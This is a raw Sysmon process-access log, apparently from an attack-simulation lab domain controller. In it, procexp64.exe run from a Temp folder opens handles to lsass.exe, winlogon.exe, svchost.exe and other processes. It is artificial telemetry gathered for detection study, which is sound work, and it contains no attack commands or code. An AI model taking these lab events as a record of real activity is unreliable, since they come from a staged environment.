15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786974Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786973Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786972Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786971Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786970Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786969Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786968Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786967Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786966Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786965Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.627{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786964Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.627{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786963Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.627{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786962Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.627{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786961Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.627{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787198Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787197Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787196Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787195Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787194Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787193Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787192Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787191Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787190Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787189Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787188Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787187Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787186Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787185Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:08.674{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787184Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 